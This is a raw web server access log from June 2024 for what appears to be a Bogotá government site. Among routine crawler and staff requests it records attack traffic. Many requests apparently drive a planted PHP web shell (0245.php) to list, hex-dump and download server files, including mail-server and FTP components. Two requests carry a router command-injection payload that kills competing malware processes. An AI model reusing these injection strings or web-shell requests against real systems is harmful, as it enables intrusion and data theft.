201.245.192.253 - - [19/Jun/2024:02:41:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.40.39 - - [19/Jun/2024:02:41:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=xfn.min.js&ft=img&white=1 HTTP/1.1" 200 441
201.245.192.253 - - [19/Jun/2024:02:42:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.96 - - [19/Jun/2024:02:42:30 -0500] "GET /Publicaciones/2024EE59663.pdf HTTP/1.1" 404 227
216.245.221.92 - - [19/Jun/2024:02:42:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:42:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.19.102 - - [19/Jun/2024:02:42:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/%27%20.%20get_author_feed_link(%20$author-%3EID,%20$args[%27feed_type%27]%20)%20.%20%27 HTTP/1.1" 403 1006
185.191.127.212 - - [19/Jun/2024:02:42:40 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22dvrLocker%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
114.119.135.143 - - [19/Jun/2024:02:42:48 -0500] "GET /galeria/nivo-slider/demo/images/bannerambiente.jpg HTTP/1.1" 200 158918
173.252.83.19 - - [19/Jun/2024:02:42:57 -0500] "GET / HTTP/1.1" 200 4720
173.252.83.24 - - [19/Jun/2024:02:42:58 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.6 - - [19/Jun/2024:02:43:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1438.pdf HTTP/1.1" 304 -
47.128.96.41 - - [19/Jun/2024:02:43:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5C&f=metalmecanica.html&ft=img&white=1 HTTP/1.1" 200 1969
47.128.125.24 - - [19/Jun/2024:02:42:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0924.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 1281750
47.128.111.98 - - [19/Jun/2024:02:43:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=bearlang.hu&ft=download HTTP/1.1" 200 1081
172.22.2.4 - - [19/Jun/2024:02:43:25 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:43:26 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [19/Jun/2024:02:43:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:43:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:02:43:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.96.135 - - [19/Jun/2024:02:43:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/user_%04d%02d.%s HTTP/1.1" 400 945
94.16.31.222 - - [19/Jun/2024:02:43:59 -0500] "GET /php/ProyectosInversion/Ficha%20ebi.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:02:44:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.36.119 - - [19/Jun/2024:02:44:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cestado%5C&f=estado.php&ft=img&white=1 HTTP/1.1" 200 8724
201.245.192.253 - - [19/Jun/2024:02:44:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.29 - - [19/Jun/2024:02:44:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=bookmark.php&ft=img&white=1 HTTP/1.1" 200 13277
47.128.39.111 - - [19/Jun/2024:02:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6739.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 753366
47.128.58.114 - - [19/Jun/2024:02:45:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=index.html&ft=code&white=1 HTTP/1.1" 200 63
172.22.2.4 - - [19/Jun/2024:02:43:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:45:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:45:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.122.236 - - [19/Jun/2024:02:45:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=theme-editor.php&ft=notepad HTTP/1.1" 200 10299
47.128.113.53 - - [19/Jun/2024:02:46:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=phpinfo.php&ft=code&white=1 HTTP/1.1" 200 128
201.245.192.253 - - [19/Jun/2024:02:46:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:02:44:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.98.166 - - [19/Jun/2024:02:46:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=phpunit.xml.hhvm&ft=code&white=1 HTTP/1.1" 200 469
201.245.192.253 - - [19/Jun/2024:02:46:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.243 - - [19/Jun/2024:02:46:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=NOTEMPTY&ft=code&white=1 HTTP/1.1" 200 63
47.128.113.52 - - [19/Jun/2024:02:47:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE%5C&f=ppass32.dll&ft=img&white=1 HTTP/1.1" 200 58368
172.22.2.4 - - [19/Jun/2024:02:47:23 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [19/Jun/2024:02:47:24 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 200 47616
216.245.221.92 - - [19/Jun/2024:02:47:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:47:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.62.134 - - [19/Jun/2024:02:47:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=tphone.bmp&ft=notepad&white=1 HTTP/1.1" 200 2814
201.245.192.253 - - [19/Jun/2024:02:47:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.254 - - [19/Jun/2024:02:47:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1693.pdf HTTP/1.1" 200 690150
47.128.18.65 - - [19/Jun/2024:02:47:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/server_engines.php%27%20.%20%20%20%20%20PMA_URL_getCommon(%20%20%20%20%20array(%27engine%27%20=%3E%20%20%20%20%27InnoDB%27,%20%27page%27%20=%3E%20%20%20%20%27Status%27)%20%20%20%20%20)%20.%20%27 HTTP/1.1" 403 1006
201.245.192.253 - - [19/Jun/2024:02:48:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.57.10 - - [19/Jun/2024:02:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page89.swf&ft=notepad&white=1 HTTP/1.1" 200 20167
201.245.192.253 - - [19/Jun/2024:02:48:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:48:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.47.196 - - [19/Jun/2024:02:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=footer.php&ft=html&white=1 HTTP/1.1" 200 296
47.128.47.196 - - [19/Jun/2024:02:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/bootstrap.min.js HTTP/1.1" 404 1420
47.128.47.196 - - [19/Jun/2024:02:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.min.js HTTP/1.1" 404 1420
47.128.47.196 - - [19/Jun/2024:02:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/jquery.dataTables.min.js HTTP/1.1" 404 1420
47.128.47.196 - - [19/Jun/2024:02:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/js/dataTables.bootstrap.js HTTP/1.1" 404 1420
47.128.18.79 - - [19/Jun/2024:02:49:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=media-button-2x.png&ft=notepad HTTP/1.1" 200 850
156.59.198.135 - - [19/Jun/2024:02:49:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_1ea881usrss1uq6eqmrm8hhbp4 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:02:49:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:49:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.135 - - [19/Jun/2024:02:49:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_1ca08svgn3lho29fli76intus1 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:02:50:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:02:50:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.98 - - [19/Jun/2024:02:50:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/tbl_tracking.php%27;%20%20%20%20%20%20%20%20$html%20.=%20PMA_URL_getCommon(%20%20%20%20%20%20%20%20%20%20%20%20$url_params%20+%20array(%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27report%27%20=%3E%20%27true%27,%20%27version%27%20=%3E%20$version[%27version%27]%20%20%20%20%20%20%20%20%20%20%20%20)%20%20%20%20%20%20%20%20);%20%20%20%20%20%20%20%20$html%20.=%20%27 HTTP/1.1" 403 1006
141.98.11.79 - - [19/Jun/2024:02:50:50 -0500] "CONNECT google.com:443 HTTP/1.1" 405 938
47.128.34.151 - - [19/Jun/2024:02:50:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150907-1550-947000.txt&ft=notepad&white=1 HTTP/1.1" 200 678
185.224.128.43 - - [19/Jun/2024:02:51:08 -0500] "GET / HTTP/1.1" 200 319
47.128.125.103 - - [19/Jun/2024:02:50:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=ter32.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 2268886
172.22.2.4 - - [19/Jun/2024:02:49:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:51:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:51:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.56.100 - - [19/Jun/2024:02:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=dwarn.mer&ft=code&white=1 HTTP/1.1" 200 434
172.22.2.4 - - [19/Jun/2024:02:51:58 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 971292
172.22.2.4 - - [19/Jun/2024:02:50:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [19/Jun/2024:02:52:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.42.5 - - [19/Jun/2024:02:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CFileZillaFTP%5C&f=libeay32.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 1367766
47.128.114.19 - - [19/Jun/2024:02:52:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=registration.php&ft=code&white=1 HTTP/1.1" 200 283
66.249.79.131 - - [19/Jun/2024:02:52:32 -0500] "GET /conviertete-en-guardiana-de-los-humedales-y-fortalece-tus-conocimientos-para-la-proteccion-de-estos-ecosistemas-mitigadores-del-cambio-climatico.html HTTP/1.1" 200 1055
216.245.221.92 - - [19/Jun/2024:02:52:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:52:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.131 - - [19/Jun/2024:02:52:33 -0500] "GET /la-secretaria-de-ambiente-reconocera-los-techos-verdes-y-jardines-verticales-mas-destacados-de-bogota.html HTTP/1.1" 200 985
47.128.35.77 - - [19/Jun/2024:02:52:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5C&f=filezilla.doc&ft=info&fullhexdump=1 HTTP/1.1" 200 17489622
47.128.125.42 - - [19/Jun/2024:02:53:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=New+Text+Document.txt&ft=notepad HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:53:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.170 - - [19/Jun/2024:02:53:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=MERCURY_EXAMPLE.INI&ft=code&white=1 HTTP/1.1" 200 2450
201.245.192.253 - - [19/Jun/2024:02:53:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:02:53:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.51.51 - - [19/Jun/2024:02:52:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2427.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1584854
35.89.226.185 - - [19/Jun/2024:02:53:55 -0500] "GET /robots.txt HTTP/1.1" 404 1018
35.89.226.185 - - [19/Jun/2024:02:53:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 304 -
31.148.130.72 - - [19/Jun/2024:02:54:02 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-142.pdf HTTP/1.1" 200 2969432
207.46.13.102 - - [19/Jun/2024:02:54:10 -0500] "GET /BLA/resoluciones/AUTOS%202023/1679.pdf HTTP/1.1" 304 -
201.245.192.253 - - [19/Jun/2024:02:54:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.58.189 - - [19/Jun/2024:02:54:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=60Segundos_Agosto20.flv&ft=notepad HTTP/1.1" 200 4587194
176.9.137.113 - - [19/Jun/2024:02:54:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1072.pdf HTTP/1.1" 200 315843
201.245.192.253 - - [19/Jun/2024:02:54:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.52.220 - - [19/Jun/2024:02:53:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2529.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 473227
156.59.198.135 - - [19/Jun/2024:02:55:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_m93rgm0e1m96l9qddo4msgfnj6 HTTP/1.0" 200 1034
47.128.32.148 - - [19/Jun/2024:02:54:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2009%5C&sort=0a HTTP/1.1" 200 363021
47.128.51.165 - - [19/Jun/2024:02:55:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=MERCURYS.ACL&ft=code&white=1 HTTP/1.1" 200 89
185.191.127.212 - - [19/Jun/2024:02:55:31 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22dvrLocker%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:02:55:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.235 - - [19/Jun/2024:02:55:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1693.pdf HTTP/1.1" 200 690150
201.245.192.253 - - [19/Jun/2024:02:55:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.31.23 - - [19/Jun/2024:02:55:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&f=logo_Bicentenario.gif&ft=code&white=1 HTTP/1.1" 200 6077
201.245.192.253 - - [19/Jun/2024:02:56:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
35.89.226.185 - - [19/Jun/2024:02:56:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2700.pdf HTTP/1.1" 304 -
201.245.192.253 - - [19/Jun/2024:02:56:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.124 - - [19/Jun/2024:02:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=ms-upgrade-network.php&white=1 HTTP/1.1" 200 309
52.167.144.216 - - [19/Jun/2024:02:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202022/1281.pdf HTTP/1.1" 200 394743
156.59.198.136 - - [19/Jun/2024:02:57:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_0rf4cmpma8h5urji9rbs7senq3 HTTP/1.0" 200 1034
172.22.2.4 - - [19/Jun/2024:02:55:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Jun/2024:02:57:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [19/Jun/2024:02:57:22 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [19/Jun/2024:02:57:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
156.59.198.136 - - [19/Jun/2024:02:57:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_ec2drj0vrnm8ld4vo0oc31dje3 HTTP/1.0" 200 1034
216.245.221.92 - - [19/Jun/2024:02:57:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:02:57:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:02:57:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.135 - - [19/Jun/2024:02:57:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_r2of2p5bhopvuu9pjrhaj2h9p2 HTTP/1.0" 200 1034
172.22.2.4 - - [19/Jun/2024:02:56:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
156.59.198.136 - - [19/Jun/2024:02:58:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_uvu8i4c2klk0tv4cq3lll99ma1 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:02:58:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:02:58:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.136 - - [19/Jun/2024:02:58:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_403rj8a7i6s1t7nhsd67sdos65 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:02:58:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [19/Jun/2024:02:58:59 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/SENTENCIA%20C-703%20DE%202010.xls HTTP/1.1" 304 -
